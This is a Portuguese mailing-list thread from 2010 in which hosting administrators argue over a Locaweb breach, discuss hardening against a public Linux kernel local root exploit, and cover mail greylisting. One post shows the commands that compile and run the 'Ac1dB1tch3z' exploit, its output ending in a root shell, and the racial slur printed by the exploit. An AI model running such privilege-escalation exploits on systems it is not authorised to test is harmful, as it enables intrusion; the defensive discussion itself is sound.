0x7fa4543c $$$ 0v3r thr0w f0ps g0v3rnm3nt $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP sh-3.2# whoami; id root uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc compilar o exploit em 32bits.. em um lik ja publicado aqui, (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/) tem um codigo para desligar a compatibilidade 32bits... se nao rodar nenhum software que seja 32bits.. o melhor eh desativar definitivamente a compatibilidade !! :) Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: > ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da > locaweb foi comprometido, em quest?o de horas os servi?os foram normalizados > e isso sim ? bom. > > Procure por dom?nios de grandes provedores aqui: > http://www.zone-h.com/archive > > terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um > pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando > apenas de ataques que se tornaram p?blicos...). > > O importante ? que eles busquem aprender com o ocorrido, e com certeza isso > deve acontecer, elevando ainda mais a sua maturidade. > > []s > > Em 18 de setembro de 2010 17:57, Guilherme Boingescreveu: > >> Roberto, >> >> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que houve, >> ? >> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >> 'defaceados'. >> >> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado corre??es >> e >> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel >> de >> kernel. >> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio algum, >> se tratando de plataforma web. Muito menos, garantir acesso SSH. >> >> Se a Locaweb deseja garantir, por comodidade e como um diferencial, acesso >> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >> servidores, para depois sim, tomar um passo deste. >> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >> prover o acesso SSH aos clientes ou n?o. >> >> Essa historia se resume em amadorismo. >> >> 2010/9/18 Roberto Bert? >> >>> Ola Guilherme, >>> >>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >> Pode >>> ter sido outra coisa, mas duvido muito. >>> >>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >> por >>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram a >>> falha, ou nos que divulgaram a falha na internet junto com o exploit, ou >>> at? >>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>> metodo >>> seguro de divulgar falhas de seguranca primeiro para as empresas que >> podem >>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>> >>> Nao ? bug de chroot de ftp. >>> >>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >> num >>> ambiente de testes. >>> >>> >>> >>> 2010/9/18 Guilherme Boing >>> >>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >> que >>>> foi publicado com o acontecido na Locaweb ? >>>> >>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de >>>> quem, >>>> dos usu?rios ? >>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o sistema >>> for >>>> bem protegido e bem administrado. >>>> >>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>> executado >>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>> >>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >> privil?gios >>>> do >>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >> pelo >>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>> atualizado como bem protegido. >>>> >>>> 2010/9/18 Roberto Bert? >>>> >>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >> segunda >>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>> >> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>> < >>>>> >> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > > -- Sds. Alexandre Jeronimo Correa S?cio-Administrador Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From algorges at gmail.com Sun Sep 19 19:14:52 2010 From: algorges at gmail.com (Alexandre Gorges) Date: Sun, 19 Sep 2010 19:14:52 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: Message-ID: Eu acho que esse caso de ataque de exploit foi outro caso. O problema dos emails ? outro e ainda permanece. Verifiquei os logs antigos e vi que agora a locaweb aponta o seu mx para apenas um endere?o. Agora parece existir um controle por greylist. Vejam alguns emails na minha fila, esse ? o problema que vem acontecendo na demora de envio de emails para clientes que hospedam na locaweb. (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) []'s Alexandre Gorges http://www.google.com.br/profiles/algorges MSN/Skype: alexandre at dag.net.br ICQ: 2031408 > From: Jean Marcel Vosch > Reply-To: Lista Masoch > Date: Sun, 19 Sep 2010 15:59:15 -0300 > To: Lista Masoch > Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre > ataque cracker > > Prepotente foi a Locaweb ao n?o informar corretamente seus usu?rios. > > Em 19 de setembro de 2010 15:09, Marcelo M. Fleury > escreveu: > >> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >> locaweb foi comprometido, em quest?o de horas os servi?os foram >> normalizados >> e isso sim ? bom. >> >> Procure por dom?nios de grandes provedores aqui: >> http://www.zone-h.com/archive >> >> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um >> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando >> apenas de ataques que se tornaram p?blicos...). >> >> O importante ? que eles busquem aprender com o ocorrido, e com certeza isso >> deve acontecer, elevando ainda mais a sua maturidade. >> >> []s >> >> Em 18 de setembro de 2010 17:57, Guilherme Boing >> escreveu: >> >>> Roberto, >>> >>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que >> houve, >>> ? >>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >>> 'defaceados'. >>> >>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado >> corre??es >>> e >>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel >>> de >>> kernel. >>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio >> algum, >>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>> >>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, >> acesso >>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>> servidores, para depois sim, tomar um passo deste. >>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >>> prover o acesso SSH aos clientes ou n?o. >>> >>> Essa historia se resume em amadorismo. >>> >>> 2010/9/18 Roberto Bert? >>> >>>> Ola Guilherme, >>>> >>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>> Pode >>>> ter sido outra coisa, mas duvido muito. >>>> >>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >>> por >>>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram >> a >>>> falha, ou nos que divulgaram a falha na internet junto com o exploit, >> ou >>>> at? >>>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>> metodo >>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>> podem >>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>> >>>> Nao ? bug de chroot de ftp. >>>> >>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >>> num >>>> ambiente de testes. >>>> >>>> >>>> >>>> 2010/9/18 Guilherme Boing >>>> >>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>> que >>>>> foi publicado com o acontecido na Locaweb ? >>>>> >>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? >> de >>>>> quem, >>>>> dos usu?rios ? >>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o >> sistema >>>> for >>>>> bem protegido e bem administrado. >>>>> >>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>> executado >>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>> >>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>> privil?gios >>>>> do >>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>> pelo >>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>> atualizado como bem protegido. >>>>> >>>>> 2010/9/18 Roberto Bert? >>>>> >>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>> segunda >>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>> >>>>> >>>> >>> >> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>>> < >>>>>> >>>>> >>>> >>> >> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> >>>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> >> >> >> -- >> Att, Marcelo M. Fleury >> Blog - http://marcelomf.blogspot.com/ >> Slides - http://www.slideshare.net/marcelomf/ >> >> "O primeiro dever da intelig?ncia ? desconfiar dela mesma." By Einstein >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l From carlos at greco.com.br Sun Sep 19 19:20:24 2010 From: carlos at greco.com.br (Carlos Alberto Greco) Date: Sun, 19 Sep 2010 19:20:24 -0300 (GMT-03:00) Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: Message-ID: <5755464.261284934993218.JavaMail.SYSTEM@carlos-pc> Caro Alexandre Quando greylist esta ativado ele deve aparecer no log assim Sep 19 19:17:25 mta3 postfix/smtpd[26806]: NOQUEUE: reject: RCPT from asell.zzz.com[212.90.105.66]: 450 4.2.0 : Recipient address rejected: Greylisted, see http://postgrey.schweikert.ch/help/xxx.com.br.html; from=<1-268015-xxx.com.br?sabrina at asell.zzz.com> to= proto=SMTP helo= Greco ----- Mensagem original ----- De: "Alexandre Gorges" Para: "Lista Masoch" Enviadas: Domingo, 19 de Setembro de 2010 19:14:52 (GMT-0300) Auto-Detected Assunto: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker Eu acho que esse caso de ataque de exploit foi outro caso. O problema dos emails ? outro e ainda permanece. Verifiquei os logs antigos e vi que agora a locaweb aponta o seu mx para apenas um endere?o. Agora parece existir um controle por greylist. Vejam alguns emails na minha fila, esse ? o problema que vem acontecendo na demora de envio de emails para clientes que hospedam na locaweb. (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : Recipient address rejected: you are sending too many mails, slow down... (in reply to RCPT TO command)) []'s Alexandre Gorges http://www.google.com.br/profiles/algorges MSN/Skype: alexandre at dag.net.br ICQ: 2031408 > From: Jean Marcel Vosch > Reply-To: Lista Masoch > Date: Sun, 19 Sep 2010 15:59:15 -0300 > To: Lista Masoch > Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre > ataque cracker > > Prepotente foi a Locaweb ao n?o informar corretamente seus usu?rios. > > Em 19 de setembro de 2010 15:09, Marcelo M. Fleury > escreveu: > >> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >> locaweb foi comprometido, em quest?o de horas os servi?os foram >> normalizados >> e isso sim ? bom. >> >> Procure por dom?nios de grandes provedores aqui: >> http://www.zone-h.com/archive >> >> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um >> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando >> apenas de ataques que se tornaram p?blicos...). >> >> O importante ? que eles busquem aprender com o ocorrido, e com certeza isso >> deve acontecer, elevando ainda mais a sua maturidade. >> >> []s >> >> Em 18 de setembro de 2010 17:57, Guilherme Boing >> escreveu: >> >>> Roberto, >>> >>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que >> houve, >>> ? >>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >>> 'defaceados'. >>> >>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado >> corre??es >>> e >>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel >>> de >>> kernel. >>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio >> algum, >>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>> >>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, >> acesso >>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>> servidores, para depois sim, tomar um passo deste. >>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >>> prover o acesso SSH aos clientes ou n?o. >>> >>> Essa historia se resume em amadorismo. >>> >>> 2010/9/18 Roberto Bert? >>> >>>> Ola Guilherme, >>>> >>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>> Pode >>>> ter sido outra coisa, mas duvido muito. >>>> >>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >>> por >>>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram >> a >>>> falha, ou nos que divulgaram a falha na internet junto com o exploit, >> ou >>>> at? >>>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>> metodo >>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>> podem >>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>> >>>> Nao ? bug de chroot de ftp. >>>> >>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >>> num >>>> ambiente de testes. >>>> >>>> >>>> >>>> 2010/9/18 Guilherme Boing >>>> >>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>> que >>>>> foi publicado com o acontecido na Locaweb ? >>>>> >>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? >> de >>>>> quem, >>>>> dos usu?rios ? >>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o >> sistema >>>> for >>>>> bem protegido e bem administrado. >>>>> >>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>> executado >>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>> >>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>> privil?gios >>>>> do >>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>> pelo >>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>> atualizado como bem protegido. >>>>> >>>>> 2010/9/18 Roberto Bert? >>>>> >>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>> segunda >>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>> >>>>> >>>> >>> >> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>>> < >>>>>> >>>>> >>>> >>> >> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> >>>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> >> >> >> -- >> Att, Marcelo M. Fleury >> Blog - http://marcelomf.blogspot.com/ >> Slides - http://www.slideshare.net/marcelomf/ >> >> "O primeiro dever da intelig?ncia ? desconfiar dela mesma." By Einstein >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l __ masoch-l list https://eng.registro.br/mailman/listinfo/masoch-l -- Carlos Comercial www.greco.com.br (11) 3040.1000 - S?o Paulo Direto 3040-1001 acesse: blog.greco.com.br Tutoriais - Dicas - Suporte From algorges at gmail.com Sun Sep 19 21:39:30 2010 From: algorges at gmail.com (Alexandre Gorges) Date: Sun, 19 Sep 2010 21:39:30 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <5755464.261284934993218.JavaMail.SYSTEM@carlos-pc> Message-ID: Carlos, A mensagem pode ser editada livremente. A mensagem que voc? colocou se refere ao daemon Postgrey, mas ele n?o ? o unico que faz o papel de greylist! O postgrey voc? pode editar o perl e alterar para a mensagem que voc? desejar. []'s Alexandre Gorges http://www.google.com.br/profiles/algorges MSN/Skype: alexandre at dag.net.br ICQ: 2031408 > From: Carlos Alberto Greco > Reply-To: Lista Masoch > Date: Sun, 19 Sep 2010 19:20:24 -0300 (GMT-03:00) > To: Lista Masoch > Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre > ataque cracker > > Caro Alexandre Quando greylist esta ativado ele deve aparecer no log assim > Sep 19 19:17:25 mta3 postfix/smtpd[26806]: NOQUEUE: reject: RCPT from > asell.zzz.com[212.90.105.66]: 450 4.2.0 : Recipient > address rejected: Greylisted, see > http://postgrey.schweikert.ch/help/xxx.com.br.html; > from=<1-268015-xxx.com.br?sabrina at asell.zzz.com> to= > proto=SMTP helo= Greco ----- Mensagem original > ----- De: "Alexandre Gorges" Para: "Lista Masoch" > Enviadas: Domingo, 19 de Setembro de 2010 19:14:52 > (GMT-0300) Auto-Detected Assunto: Re: [MASOCH-L] RES: Locaweb - Problemas com > E-mails - Locaweb sofre ataque cracker Eu acho que esse caso de ataque de > exploit foi outro caso. O problema dos emails ? outro e ainda permanece. > Verifiquei os logs antigos e vi que agora a locaweb aponta o seu mx para > apenas um endere?o. Agora parece existir um controle por greylist. Vejam > alguns emails na minha fila, esse ? o problema que vem acontecendo na demora > de envio de emails para clientes que hospedam na locaweb. (host > mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : > Recipient address rejected: you are sending too many mails, slow down... (in > reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] said: 450 > 4.7.1 : Recipient address rejected: you are sending too > many mails, slow down... (in reply to RCPT TO command)) (host > mx.a.locaweb.com.br[186.202.4.42] said: 450 4.7.1 : > Recipient address rejected: you are sending too many mails, slow down... (in > reply to RCPT TO command)) []'s Alexandre Gorges > http://www.google.com.br/profiles/algorges MSN/Skype: alexandre at dag.net.br > ICQ: 2031408 > From: Jean Marcel Vosch > > Reply-To: Lista Masoch > Date: Sun, 19 Sep 2010 > 15:59:15 -0300 > To: Lista Masoch > Subject: Re: > [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre > ataque > cracker > > Prepotente foi a Locaweb ao n?o informar corretamente seus > usu?rios. > > Em 19 de setembro de 2010 15:09, Marcelo M. Fleury > > escreveu: > >> ? muita prepot?ncia dizer que a locaweb > ? amadora. Um dos servi?os da >> locaweb foi comprometido, em quest?o de > horas os servi?os foram >> normalizados >> e isso sim ? bom. >> >> Procure > por dom?nios de grandes provedores aqui: >> http://www.zone-h.com/archive >> > >> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um > >> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando > >> apenas de ataques que se tornaram p?blicos...). >> >> O importante ? que > eles busquem aprender com o ocorrido, e com certeza isso >> deve acontecer, > elevando ainda mais a sua maturidade. >> >> []s >> >> Em 18 de setembro de > 2010 17:57, Guilherme Boing >> escreveu: >> >>> Roberto, > >>> >>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que > >> houve, >>> ? >>> da Locaweb, que ? a respons?vel pela hospedagem desses > sites que foram >>> 'defaceados'. >>> >>> N?o podemos por a culpa na > RedHat, pois alem de ter sido uma escolha da >>> pr?pria Locaweb, utilizando > o kernel deles, poderia ter aplicado >> corre??es >>> e >>> m?todos de > seguran?a que inibiriam qualquer tipo de exploit local a n?vel >>> de >>> > kernel. >>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo > bin?rio >> algum, >>> se tratando de plataforma web. Muito menos, garantir > acesso SSH. >>> >>> Se a Locaweb deseja garantir, por comodidade e como um > diferencial, >> acesso >>> SSH aos clientes, deveria prezar primeiramente > pela seguran?a dos >>> servidores, para depois sim, tomar um passo deste. > >>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de > >>> prover o acesso SSH aos clientes ou n?o. >>> >>> Essa historia se > resume em amadorismo. >>> >>> 2010/9/18 Roberto Bert? > >>> >>>> Ola Guilherme, >>>> >>>> Pelos horarios > que aconteceram os eventos e as informacoes no twitter. >>> Pode >>>> ter > sido outra coisa, mas duvido muito. >>>> >>>> Olha, a discussao de quem ? a > culpa ? gigante. Podemos por a culpa no >>>> pessoal que escreveu o codigo do > kernel, podemos por a culpa na redhat >>> por >>>> nao ter auditado, podemos > por a culpa nos pesquisadores que descobriram >> a >>>> falha, ou nos que > divulgaram a falha na internet junto com o exploit, >> ou >>>> at? >>>> > mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>> > metodo >>>> seguro de divulgar falhas de seguranca primeiro para as empresas > que >>> podem >>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a > discussao. >>>> >>>> Nao ? bug de chroot de ftp. >>>> >>>> Em ambiente de > hospedagem voce da acesso aos clientes a SSH e tambem a >>>> execucao de > comados, porque tem php, perl, etc. Entao bastava subir um >>>> binario > compilado e executar ele e voce virava root. Eu reproduzi isso >>> num >>>> > ambiente de testes. >>>> >>>> >>>> >>>> 2010/9/18 Guilherme Boing > >>>> >>>>> Desculpe, mas, baseado em quais fatos voc? > relaciona o exploit '0day' >>> que >>>>> foi publicado com o acontecido na > Locaweb ? >>>>> >>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve > culpa ? A culpa ? >> de >>>>> quem, >>>>> dos usu?rios ? >>>>> Uma falha > no kernel n?o garante acesso privilegiado algum, se o >> sistema >>>> for > >>>>> bem protegido e bem administrado. >>>>> >>>>> Pra come?o de conversa, > nem deveria ser poss?vel tal exploit ser >>>> executado >>>>> em um ambiente > de webhosting, ainda mais, em cima de um usu?rio web. >>>>> >>>>> Sendo um > bug de chroot de ftp, um exploit local que elevou os >>> privil?gios >>>>> > do >>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada > >>> pelo >>>>> ocorrido, pois era de sua responsabilidade, manter o sistema > tanto >>>>> atualizado como bem protegido. >>>>> >>>>> 2010/9/18 Roberto > Bert? >>>>> >>>>>> Viu pessoal, aproveito para > divulgar o workaround e a falha, na >>> segunda >>>>>> parte do artigo tem > info de como proteger. Foi bem grave mesmo >>>>>> >>>>> >>>> >>> >> > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ > >>>>>> < >>>>>> >>>>> >>>> >>> >> > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> > >>>>> >>>> __ >>>> masoch-l list >>>> > https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> __ >>> masoch-l > list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> >> >> > >> -- >> Att, Marcelo M. Fleury >> Blog - http://marcelomf.blogspot.com/ > >> Slides - http://www.slideshare.net/marcelomf/ >> >> "O primeiro dever da > intelig?ncia ? desconfiar dela mesma." By Einstein >> __ >> masoch-l list > >> https://eng.registro.br/mailman/listinfo/masoch-l >> > __ > masoch-l > list > https://eng.registro.br/mailman/listinfo/masoch-l __ masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l -- Carlos > Comercial www.greco.com.br (11) 3040.1000 - S?o Paulo Direto 3040-1001 > acesse: blog.greco.com.br Tutoriais - Dicas - Suporte __ masoch-l > list https://eng.registro.br/mailman/listinfo/masoch-l From cleber-listas at inetweb.com.br Mon Sep 20 11:38:29 2010 From: cleber-listas at inetweb.com.br (Cleber @ Listas) Date: Mon, 20 Sep 2010 11:38:29 -0300 Subject: [MASOCH-L] RES: RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <4C966199.9050006@onda.psi.br> References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> <4C966199.9050006@onda.psi.br> Message-ID: <001601cb58d1$7e6812b0$7b383810$@inetweb.com.br> Alexandre, Concordo contigo. Essa falha do exploit todos que utilizam 64bits e o modo de compatibilidade com o mesmo Kernel e permitem SSH remoto para o usu?rio, est?o vulner?veis. Infelizmente, o caso tomou essa propor??o pelo simples motivo deles terem muitos clientes nos ambientes compartilhados. Sinceramente, para nossos clientes n?o permitidos acesso SSH, tentamos dar o maximo de ferramentas para o cliente faz?-lo via painel de controle. -----Mensagem original----- De: masoch-l-bounces at eng.registro.br [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alexandre J. Correa - Onda Internet Enviada em: domingo, 19 de setembro de 2010 16:17 Para: Mail Aid and Succor, On-line Comfort and Help Assunto: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, n?o ? "justo" (digamos assim). A falha da locaweb ? comum em v?rias empresas de hosting: - deixar os compiladores acessiveis aos usuarios. - alguns binarios como wget, nc, etc ficam disponiveis para execucao de qualquer usuario.. - permitir a execucao de scripts. - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) consegui o exploit e fiz testes em varios servidores.. [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z [alexandre at xxx aaa]$ ./Ac1dB1tch3z Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y $$$ Kallsyms +r $$$ K3rn3l r3l3as3: $$$ prepare_creds->ffffffff8024b626 $$$ override_creds->ffffffff8024b755 $$$ revert_creds->ffffffff8024bbf4 $$$ Kernel Credentials detected ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d $$$ timer_list_fops->ffffffff806bbb80 $$$ w34p0n 0f ch01c3: F0PZzZzzz $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d $$$ Prepare: m0rn1ng w0rk0ut b1tch3z $$$ Us1ng cr3d s3ash3llc0d3z $$$ 0p3n1ng th3 m4giq p0rt4l $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c $$$ 0v3r thr0w f0ps g0v3rnm3nt $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP sh-3.2# whoami; id root uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc compilar o exploit em 32bits.. em um lik ja publicado aqui, (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/) tem um codigo para desligar a compatibilidade 32bits... se nao rodar nenhum software que seja 32bits.. o melhor eh desativar definitivamente a compatibilidade !! :) Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: > ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da > locaweb foi comprometido, em quest?o de horas os servi?os foram > normalizados e isso sim ? bom. > > Procure por dom?nios de grandes provedores aqui: > http://www.zone-h.com/archive > > terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer > um pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos > falando apenas de ataques que se tornaram p?blicos...). > > O importante ? que eles busquem aprender com o ocorrido, e com certeza > isso deve acontecer, elevando ainda mais a sua maturidade. > > []s > > Em 18 de setembro de 2010 17:57, Guilherme Boingescreveu: > >> Roberto, >> >> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que >> houve, ? da Locaweb, que ? a respons?vel pela hospedagem desses sites >> que foram 'defaceados'. >> >> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha >> da pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado >> corre??es e m?todos de seguran?a que inibiriam qualquer tipo de >> exploit local a n?vel de kernel. >> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio >> algum, se tratando de plataforma web. Muito menos, garantir acesso SSH. >> >> Se a Locaweb deseja garantir, por comodidade e como um diferencial, >> acesso SSH aos clientes, deveria prezar primeiramente pela seguran?a >> dos servidores, para depois sim, tomar um passo deste. >> De qualquer forma, ? poss?vel manter seu sistema 